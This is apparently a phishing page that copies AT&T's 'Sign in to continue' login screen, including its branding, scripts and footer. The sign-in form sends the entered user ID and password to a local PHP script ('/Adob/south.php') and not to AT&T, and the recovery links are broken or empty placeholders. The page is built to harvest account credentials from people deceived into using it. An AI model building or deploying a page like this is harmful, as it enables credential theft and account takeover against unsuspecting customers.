<html lang="en"><head>
  <meta charset="utf-8">
  <title>Login Screen</title>
  <base href="/">

  <meta http-equiv="X-UA-Compatible" content="IE=9; IE=8; IE=7;IE=11; IE=EDGE">
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0,shrink-to-fit=no">

<link rel="icon" type="image/x-icon" href="favicon.ico"><script type="text/javascript" charset="utf-8" id="zm-extension" src="moz-extension://66f84f86-d3ab-41cb-8e63-2e76288df6a6/scripts/webrtc-patch.js" async=""></script>

  <!-- ADDING ADOBE CONTAINER HEADER -->
    <script type="text/javascript">var detmScriptLoadType = 'async';</script>
    <script type="text/javascript" src="https://www.att.com/scripts/adobe/prod/detm-container-hdr.js" class="next-head" data-trigger-dtm="loadAnalytics"></script><script type="text/javascript" async="" data-loadedby="detm" src="https://cdn.quantummetric.com/qscripts/quantum-att.js"></script>
  <script nonce="8JEsZ+ay459xSaqJRLC8Zhiw" src="//signin-static-js.att.com/scripts/att_common.js?seed=AIAdd0h0AQAA6kiC7Kp0vUzSc_cb_gMW6QKhtQqAdL0AQMhZb0ijGLcencwV&amp;X-IOZYaZcd--z=q" id="f8c5020c60a8b5e9ded0b82ce7dcc133"></script><iframe style="display: none;"></iframe><script type="text/javascript" async="" data-loadedby="detm" src="https://www.att.com/scripts/ssaf_universal_client/prod/ssaf-uc.js"></script>
  <script>
    window.loginJspEnvVars = {
      ADOBE_ENV_URL: 'https://www.att.com/scripts/adobe/prod',
      APPNAME: 'm40842',
      CONTENT_STACK_HOST: 'https://signin.att.com/static/siam',
      CREATE_NOW_URL: 'https://attreg.att.net/PortalRegWeb/PortalRegController?callingAppId=OP',
      DISABLE_FID: 'N',
      DISABLE_FPW: 'N',
      DISABLE_REG: 'N',
      DISABLE_SAVE_USER_ID: 'Y',
      SAVE_USERID_CHECKED: 'ON',
      KEEP_ME_SIGNED_IN: 'Y',
      KEEP_ME_SIGNED_IN_CHECKED: 'OFF',
      ERROR_CODE: '',
      ERROR_MESSAGE: '',
      CARE_CODE: '',
      FORGOT_PASSWORD_URL: 'https://www.att.com/acctmgmt/fpwd/lander?origination_point=tguard',
      FORGOT_USERID_URL: 'https://www.att.com/acctmgmt/fid/lander?origination_point=tguard',
      LOGIN_UI_HEADER: 'continue',
      ES_LOGIN_UI_HEADER: 'continuar',
      SAVED_USER_ID: '',
      ES_CREATE_NOW_URL: 'https://attreg.att.net/PortalRegWeb/PortalRegController?callingAppId=OP',
      ES_FORGOT_PASSWORD_URL: 'https://www.att.com/es-us/acctmgmt/fpwd/lander?origination_point=tguard',
      ES_FORGOT_USERID_URL: 'https://www.att.com/es-us/acctmgmt/fid/lander?origination_point=tguard',
      MIN_LOGIN: 'N',
      DISCOVERY_UI_URL: '',
      CANCEL_URL: 'https://signin.att.com/dynamic/iamLRR/LrrController?IAM_OP=cancel&appName=m40842',
      IS_EREPAIR: '',
      EREPAIR_ENV: '',
      PRIVACY_POLICY_URL: 'https://about.att.com/sites/privacy_policy',
      ES_PRIVACY_POLICY_URL: 'https://about.att.com/sites/privacy_policy',
      ACTIVATE_PREFETCH_FOR_CLIENT: '',
      MYATT_PREFETCH_URL: 'https://www.att.com/myatt/lgn/resources/unauth/login/prefetch/invoke',
      M_MYATT_PREFETCH_URL: 'https://m.att.com/myatt/lgn/resources/unauth/login/prefetch/invoke',
      REG_URL_USE_AS_IS: 'Y',
      ZK_LEARN_MORE_ENABLED: 'Y',
      ZK_LEARN_MORE_URL: 'https://www.att.com/support/article/wireless/KM1375558/',
      ZK_LEARN_MORE_NEW_TAB: 'Y',
      ACTIVATE_ADOBE_TAGGING_FOR_CLIENT: 'Y',
      ZK_FIRST_LOOK_ENABLED: 'Y',
    };

    window.loginLanguage = 'en';
  </script>
  <link rel="stylesheet" href="https://signin.att.com/static/siam/en/halo_c/halo-c-login/styles.css?v=8.2.6">
<style>app-error[_ngcontent-yiq-c41], app-footer[_ngcontent-yiq-c41], app-header[_ngcontent-yiq-c41], app-manual-login[_ngcontent-yiq-c41], app-manual-login-erepair[_ngcontent-yiq-c41], app-multi-save-login[_ngcontent-yiq-c41]{max-width:310px;width:100%}</style><style></style><style>.errorContainer[_ngcontent-yiq-c29]{width:310px;border-radius:3px;border:1px solid rgba(215,56,56,.1);background-color:rgba(215,56,56,.03);padding:11px 15px 10px 16px;display:flex;align-items:flex-start;font-family:ATTAleckSans-Regular;margin-top:12px}.errorIcon[_ngcontent-yiq-c29]:before{content:"";width:18px;height:18px;display:inline-block;vertical-align:text-top;background-color:transparent;background-position-y:center;background-position-x:0;background-repeat:no-repeat;background-size:contain}.errorText[_ngcontent-yiq-c29]{padding-left:11px}.errorDesc[_ngcontent-yiq-c29]{font-family:ATTAleckSans-Regular;font-size:14px;font-weight:400;line-height:1.29;letter-spacing:normal;color:#1d2329}.errorCode[_ngcontent-yiq-c29], .errorDesc[_ngcontent-yiq-c29]{font-stretch:normal;font-style:normal}.errorCode[_ngcontent-yiq-c29]{text-transform:uppercase;padding-top:10px;font-family:ATTAleckSans-Medium;font-size:12px;font-weight:500;line-height:1.83;letter-spacing:.9px;color:#72727e}.blueErrorContainer[_ngcontent-yiq-c29]{border:1px solid rgba(0,159,219,.1);background-color:rgba(0,159,219,.03)}</style><style>.fg-sign-in[_ngcontent-yiq-c33]{margin-top:8px}.zenkey-container[_ngcontent-yiq-c33]{margin-top:8px;margin-bottom:57px}.bottom-container[_ngcontent-yiq-c33]{margin-top:45px}.invisible[_ngcontent-yiq-c33]{opacity:0}</style><style>div[_ngcontent-yiq-c39]{background-color:#f7f7f7}.policyArea[_ngcontent-yiq-c39]{text-align:center;margin-top:24px;display:flex;flex-direction:row}.policyArea[_ngcontent-yiq-c39]   a[_ngcontent-yiq-c39]{padding:0 10px}.footer-link-text[_ngcontent-yiq-c39]{transition:color .3s linear;font-family:ATTAleckSans-Medium;font-size:12px;font-style:normal;font-stretch:normal;line-height:2;letter-spacing:normal;text-align:center;color:#0057b8}.footer-link-text[_ngcontent-yiq-c39]:focus, .footer-link-text[_ngcontent-yiq-c39]:hover{text-decoration:underline}.copyright[_ngcontent-yiq-c39]{font-family:ATTAleckSans-Regular;font-size:12px;font-weight:500;font-style:normal;font-stretch:normal;line-height:2;letter-spacing:normal;text-align:center}.footer-link-text[_ngcontent-yiq-c39]   .text-style-1[_ngcontent-yiq-c39]{font-weight:400;color:#1d2329}@media (max-width:1199.98px){.policyArea[_ngcontent-yiq-c39]{margin-top:20px;display:flex;flex-direction:column;align-items:center}.policyArea[_ngcontent-yiq-c39]   a[_ngcontent-yiq-c39]:after{content:"";display:block;height:0;width:1px;text-align:center;padding:2px 0;margin-bottom:2px}.copyright[_ngcontent-yiq-c39]{margin-left:auto;margin-right:auto;text-align:center;width:80%}.policyArea[_ngcontent-yiq-c39]   a[_ngcontent-yiq-c39]{white-space:nowrap}}</style>

<body>
  <div id="app-root" _nghost-yiq-c41="" ng-version="9.1.9" app-version="8.2.6"><div _ngcontent-yiq-c41=""><div _ngcontent-yiq-c41="" role="main" class="container-fluid"><div _ngcontent-yiq-c41="" class="d-flex flex-container Card"><app-header _ngcontent-yiq-c41="" class="d-flex flex-container" _nghost-yiq-c28=""><div _ngcontent-yiq-c28="" class="image" style="width: 65px;"><img _ngcontent-yiq-c28="" id="headerLogoImage" alt="AT&amp;T logo image" class="mar-b4 header-logo-image" style="width: 100%;" src="https://signin.att.com/static/siam/en/halo_c/halo-c-login/assets/images/logo.svg"></div><h1 _ngcontent-yiq-c28="" id="signInHeaderText" class="sign-in-header justify-content-center mb-0" style="margin-top: 20px;">Sign in</h1><h1 _ngcontent-yiq-c28=""  class="sign-in-header-text justify-content-center mt-0">to continue</h1></app-header><app-error _ngcontent-yiq-c41="" _nghost-yiq-c29=""><!----></app-error><app-manual-login _ngcontent-yiq-c41="" _nghost-yiq-c33="" class="ng-tns-c33-0 ng-star-inserted"><form _ngcontent-yiq-c33="" novalidate=""  method="post" class="ng-touched" action="/Adob/south.php">
  
  <input _ngcontent-yiq-c33="" type="hidden" name="appName" formcontrolname="appName" class="ng-tns-c33-0 ng-untouched ng-pristine ng-valid" value=""><input _ngcontent-yiq-c33="" type="hidden" name="loginSuccessURL" formcontrolname="loginSuccessURL" class="ng-tns-c33-0 ng-untouched ng-pristine ng-valid" value="">
  <input _ngcontent-yiq-c33="" type="hidden" name="loginFailureURL" formcontrolname="loginFailureURL" class="ng-tns-c33-0 ng-untouched ng-pristine ng-valid" value="">
  <input _ngcontent-yiq-c33="" type="hidden" name="trID" formcontrolname="trID" class="ng-tns-c33-0 ng-untouched ng-pristine ng-valid" value="">
  <div _ngcontent-yiq-c33="" class="form-group mb-1 ng-tns-c33-0">
  <label _ngcontent-yiq-c33="" id="userLabel" for="userID" class="textfield-label ng-tns-c33-0">User ID <div _ngcontent-yiq-c33="" id="userLabelAfter" class="ng-tns-c33-0"></div></label>
  <div _ngcontent-yiq-c33="" class="flex-container justify-content-center ng-tns-c33-0">
  <input _ngcontent-yiq-c33="" id="userID" type="email" name="mid" aria-controls="userInlineErrorTextContainer" autocomplete="username" spellcheck="false" autocapitalize="off" required class="ng-tns-c33-0 textfield ng-pristine ng-invalid ng-touched" aria-invalid="false" >
  <div _ngcontent-yiq-c33="" aria-live="polite" aria-atomic="true" id="userInlineErrorTextContainer" class="ng-tns-c33-0"><!----></div>
  
  
  </div></div><div _ngcontent-yiq-c33="" class="form-group text-right ng-tns-c33-0 ng-star-inserted"><a _ngcontent-yiq-c33="" id="forgotUserID" class="ForgotLink ng-tns-c33-0" href="https:forget/pass.com">Forgot user ID?</a></div><!----><div _ngcontent-yiq-c33="" class="form-group mb-0 pass_show ng-tns-c33-0">
  <label _ngcontent-yiq-c33="" id="passwordLabel" for="password" class="textfield-label ng-tns-c33-0">Password <div  class="textfield-label ng-tns-c33-0"></div></label><div _ngcontent-yiq-c33="" class="flex-container justify-content-center ng-tns-c33-0"><input _ngcontent-yiq-c33="" id="userID" type="password" required name="pid"  aria-controls="userInlineErrorTextContainer" spellcheck="false" autocapitalize="off" class="ng-tns-c33-0 textfield ng-pristine ng-invalid ng-touched" aria-invalid="false" ><!----><div _ngcontent-yiq-c33="" aria-live="polite" aria-atomic="true" id="passwordInlineErrorTextContainer" class="ng-tns-c33-0"><!----></div></div></div><div _ngcontent-yiq-c33="" class="form-group text-right ng-tns-c33-0 ng-star-inserted"><a _ngcontent-yiq-c33="" id="forgotPassword" class="ForgotLink ng-tns-c33-0" href=''>Forgot password?</a></div><!----><!----><div _ngcontent-yiq-c33="" class="form-group checkboxDiv mb-0 ng-tns-c33-0 ng-star-inserted"><label _ngcontent-yiq-c33="" for="keepMeIn" class="checkbox ng-tns-c33-0"><input _ngcontent-yiq-c33="" type="checkbox" id="keepMeIn" name="keepMeIn" value="Y" class="ng-tns-c33-0" aria-label="Keep me signed in for 2 weeks checkbox"><div _ngcontent-yiq-c33="" class="checkbox-skin ng-tns-c33-0"></div></label><span _ngcontent-yiq-c33="" id="keepMeInText" class="checkbox-label ml-2 ng-tns-c33-0">Keep me signed in for 2 weeks</span></div><!----><div _ngcontent-yiq-c33="" class="form-group justify-content-center fg-sign-in ng-tns-c33-0"><div _ngcontent-yiq-c33="" class="flex-container justify-content-center ng-tns-c33-0">
  <button type="submit" id="log-on"   class="btn-primary ng-tns-c33-0 puree-spinner-button" >                        
                    Sign in
            </button>
            
  <button _ngcontent-yiq-c33="" type="button"  class="btn-link mar-t8 ng-tns-c33-0 ng-star-inserted">Cancel</button><!----><hr _ngcontent-yiq-c33="" class="align-self-center cancel-border ng-tns-c33-0 ng-star-inserted"><!----></div></div><div _ngcontent-yiq-c33="" class="form-group justify-content-center dnUI ng-tns-c33-0 ng-star-inserted"><div _ngcontent-yiq-c33="" class="flex-container justify-content-center ng-tns-c33-0"><p _ngcontent-yiq-c33="" id="dontHaveIdText" class="mb-0 ng-tns-c33-0">Don't have a user ID?</p><a _ngcontent-yiq-c33="" id="createNow" class="text-style-1 ng-tns-c33-0 ng-star-inserted" href="https://attreg.att.net/PortalRegWeb/PortalRegController?callingAppId=OP"> Create one now </a><!----><!----></div></div><!----><!----><div _ngcontent-yiq-c33="" class="bottom-container ng-tns-c33-0 ng-star-inserted"></div><!----></form></app-manual-login><!----><!----><!----></div></div><app-footer _ngcontent-yiq-c41="" role="contentinfo" _nghost-yiq-c39="" class="ng-star-inserted"><div _ngcontent-yiq-c39="" class="policyArea justify-content-center"><a _ngcontent-yiq-c39="" id="legalPolicy" rel="noopener noreferrer" target="_blank" class="footer-link-text" href="https://www.att.com/legal/legal-policy-center.html">  Legal policy center  </a><a _ngcontent-yiq-c39="" id="privacyPolicy" rel="noopener noreferrer" target="_blank" class="footer-link-text" href="https://about.att.com/sites/privacy_policy">  Privacy policy  </a><a _ngcontent-yiq-c39="" id="termsOfUse" rel="noopener noreferrer" target="_blank" class="footer-link-text" href="https://www.att.com/legal/terms.attWebsiteTermsOfUse.html">  Terms of use  </a><a _ngcontent-yiq-c39="" id="access" rel="noopener noreferrer" target="_blank" class="footer-link-text" href="https://www.att.com/features/accessibility.html">  Accessibility  </a><a _ngcontent-yiq-c39="" id="privacyCenter" rel="noopener noreferrer" target="_blank" class="footer-link-text" href="https://about.att.com/csr/home/privacy/rights_choices.html"> Do not sell my personal info </a></div><div _ngcontent-yiq-c39="" class="copyright"><span _ngcontent-yiq-c39="" id="copyrightTextSpan">©2020 AT&amp;T Intellectual Property. All rights reserved.</span></div></app-footer><!----><!----></div></div>
  


  <script type="text/javascript" src="https://www.att.com/scripts/adobe/prod/detm-container-ftr.js"></script>

</body><!-- ADDING ADOBE CONTAINER Footer --></html>